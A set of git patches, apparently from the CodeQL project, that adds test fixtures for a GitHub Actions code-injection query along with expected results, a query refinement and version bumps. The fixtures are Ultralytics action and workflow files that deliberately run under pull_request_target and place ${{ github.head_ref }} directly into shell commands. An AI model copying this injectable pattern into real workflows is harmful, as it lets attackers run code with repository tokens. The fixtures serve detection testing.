    From f82fa202496071d8587a6c6b96b836dd55813061 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Mon, 9 Dec 2024 20:37:11 +0000 Subject: [PATCH 0958/1267] Update test outputs --- .../test/library-tests/frameworks/Genshi/ConceptsTest.expected | 2 -- .../ql/test/library-tests/frameworks/Mako/ConceptsTest.expected | 2 -- .../test/library-tests/frameworks/TRender/ConceptsTest.expected | 2 -- .../library-tests/frameworks/airspeed/ConceptsTest.expected | 2 -- .../library-tests/frameworks/chameleon/ConceptsTest.expected | 2 -- .../test/library-tests/frameworks/chevron/ConceptsTest.expected | 2 -- .../test/library-tests/frameworks/jinja2/ConceptsTest.expected | 2 -- 7 files changed, 14 deletions(-) diff --git a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file From b80d3d56a364d7ddcd718126ba7ac559a3fcae64 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:09 +0100 Subject: [PATCH 0959/1267] exclude Simple refereces from GitHub context --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 12a65a52baa..9668fce2ae0 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -245,7 +245,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or @@ -279,7 +280,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or From bee0668cd0981df475b958469bf78d22bcd0e9d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:28 +0100 Subject: [PATCH 0960/1267] Add tests and update expected results --- .../.github/actions/action6/action.yml | 251 +++++++++++++++++ .../.github/actions/action7/action.yml | 252 ++++++++++++++++++ .../CWE-094/.github/workflows/test28.yml | 34 +++ .../CWE-094/CodeInjectionCritical.expected | 9 + .../CWE-094/CodeInjectionMedium.expected | 15 ++ .../UntrustedCheckoutCritical.expected | 4 - 6 files changed, 561 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml new file mode 100644 index 00000000000..0048a4ca31e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -0,0 +1,251 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml new file mode 100644 index 00000000000..8bffcdc4020 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml @@ -0,0 +1,252 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + # this action is not called in the test + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml new file mode 100644 index 00000000000..dbc0137ed5b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml @@ -0,0 +1,34 @@ +# Ultralytics 🚀 - AGPL-3.0 License https://ultralytics.com/license +# Ultralytics Actions https://github.com/ultralytics/actions +# This workflow automatically formats code and documentation in PRs to official Ultralytics standards + +name: Ultralytics Actions + +on: + issues: + types: [opened, edited] + discussion: + types: [created] + pull_request_target: + branches: [main] + types: [opened, closed, synchronize, review_requested] + +permissions: + contents: write + +jobs: + format: + runs-on: ubuntu-latest + steps: + - name: Run Ultralytics Formatting + uses: ./.github/actions/action6 + with: + token: ${{ secrets._GITHUB_TOKEN }} # note GITHUB_TOKEN automatically generated + labels: true # autolabel issues and PRs + python: true # format Python code and docstrings + prettier: true # format YAML, JSON, Markdown and CSS + spelling: true # check spelling + links: false # check broken links + summary: true # print PR summary with GPT4o (requires 'openai_api_key') + openai_api_key: ${{ secrets.OPENAI_API_KEY }} + first_issue_response: "foo" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index deee6f5202b..b2afe0577aa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e13c2b80a72..605fa2924ff 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$( Date: Mon, 9 Dec 2024 21:48:17 +0100 Subject: [PATCH 0961/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d938d0617e9..dd83f705219 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.1 +version: 0.2.2 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ac2c74011..90c64f0b746 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.1 +version: 0.2.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8f5822e4c6b6618e029d02eb2ef94c356a175a35 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Tue, 10 Dec 2024 00:22:53 +0000 Subject: [PATCH 0962/1267] Add changed framework coverage reports --- csharp/documentation/library-coverage/coverage.csv | 1 + csharp/documentation/library-coverage/coverage.rst | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/csharp/documentation/library-coverage/coverage.csv b/csharp/documentation/library-coverage/coverage.csv index 39646702a8c..50035b8a009 100644 --- a/csharp/documentation/library-coverage/coverage.csv +++ b/csharp/documentation/library-coverage/coverage.csv @@ -14,6 +14,7 @@ Microsoft.Android.Build,,1,14,,,,,,,,,,,,,1,,,,,,12,2 Microsoft.Apple.Build,,,7,,,,,,,,,,,,,,,,,,,7, Microsoft.ApplicationBlocks.Data,28,,,,,,,,,,,,28,,,,,,,,,, Microsoft.AspNetCore.Components,,2,1,,,,,,,,,,,,,,,,2,,,1, +Microsoft.AspNetCore.Mvc,,,2,,,,,,,,,,,,,,,,,,,,2 Microsoft.AspNetCore.WebUtilities,,,2,,,,,,,,,,,,,,,,,,,2, Microsoft.CSharp,,,2,,,,,,,,,,,,,,,,,,,2, Microsoft.Diagnostics.Tools.Pgo,,,25,,,,,,,,,,,,,,,,,,,2,23 diff --git a/csharp/documentation/library-coverage/coverage.rst b/csharp/documentation/library-coverage/coverage.rst index 7023de4a356..77354aa656d 100644 --- a/csharp/documentation/library-coverage/coverage.rst +++ b/csharp/documentation/library-coverage/coverage.rst @@ -9,6 +9,6 @@ C# framework & library support Framework / library,Package,Flow sources,Taint & value steps,Sinks (total),`CWE-079` :sub:`Cross-site scripting` `ServiceStack `_,"``ServiceStack.*``, ``ServiceStack``",,7,194, System,"``System.*``, ``System``",47,10819,54,5 - Others,"``Amazon.Lambda.APIGatewayEvents``, ``Amazon.Lambda.Core``, ``Dapper``, ``ILCompiler``, ``ILLink.RoslynAnalyzer``, ``ILLink.Shared``, ``ILLink.Tasks``, ``Internal.IL``, ``Internal.Pgo``, ``Internal.TypeSystem``, ``JsonToItemsTaskFactory``, ``Microsoft.Android.Build``, ``Microsoft.Apple.Build``, ``Microsoft.ApplicationBlocks.Data``, ``Microsoft.AspNetCore.Components``, ``Microsoft.AspNetCore.WebUtilities``, ``Microsoft.CSharp``, ``Microsoft.Diagnostics.Tools.Pgo``, ``Microsoft.DotNet.Build.Tasks``, ``Microsoft.DotNet.PlatformAbstractions``, ``Microsoft.EntityFrameworkCore``, ``Microsoft.Extensions.Caching.Distributed``, ``Microsoft.Extensions.Caching.Memory``, ``Microsoft.Extensions.Configuration``, ``Microsoft.Extensions.DependencyInjection``, ``Microsoft.Extensions.DependencyModel``, ``Microsoft.Extensions.Diagnostics.Metrics``, ``Microsoft.Extensions.FileProviders``, ``Microsoft.Extensions.FileSystemGlobbing``, ``Microsoft.Extensions.Hosting``, ``Microsoft.Extensions.Http``, ``Microsoft.Extensions.Logging``, ``Microsoft.Extensions.Options``, ``Microsoft.Extensions.Primitives``, ``Microsoft.Interop``, ``Microsoft.JSInterop``, ``Microsoft.NET.Build.Tasks``, ``Microsoft.NET.Sdk.WebAssembly``, ``Microsoft.NET.WebAssembly.Webcil``, ``Microsoft.VisualBasic``, ``Microsoft.WebAssembly.Build.Tasks``, ``Microsoft.Win32``, ``Mono.Linker``, ``MySql.Data.MySqlClient``, ``Newtonsoft.Json``, ``SourceGenerators``, ``Windows.Security.Cryptography.Core``",59,2071,150,2 - Totals,,106,12897,398,7 + Others,"``Amazon.Lambda.APIGatewayEvents``, ``Amazon.Lambda.Core``, ``Dapper``, ``ILCompiler``, ``ILLink.RoslynAnalyzer``, ``ILLink.Shared``, ``ILLink.Tasks``, ``Internal.IL``, ``Internal.Pgo``, ``Internal.TypeSystem``, ``JsonToItemsTaskFactory``, ``Microsoft.Android.Build``, ``Microsoft.Apple.Build``, ``Microsoft.ApplicationBlocks.Data``, ``Microsoft.AspNetCore.Components``, ``Microsoft.AspNetCore.Mvc``, ``Microsoft.AspNetCore.WebUtilities``, ``Microsoft.CSharp``, ``Microsoft.Diagnostics.Tools.Pgo``, ``Microsoft.DotNet.Build.Tasks``, ``Microsoft.DotNet.PlatformAbstractions``, ``Microsoft.EntityFrameworkCore``, ``Microsoft.Extensions.Caching.Distributed``, ``Microsoft.Extensions.Caching.Memory``, ``Microsoft.Extensions.Configuration``, ``Microsoft.Extensions.DependencyInjection``, ``Microsoft.Extensions.DependencyModel``, ``Microsoft.Extensions.Diagnostics.Metrics``, ``Microsoft.Extensions.FileProviders``, ``Microsoft.Extensions.FileSystemGlobbing``, 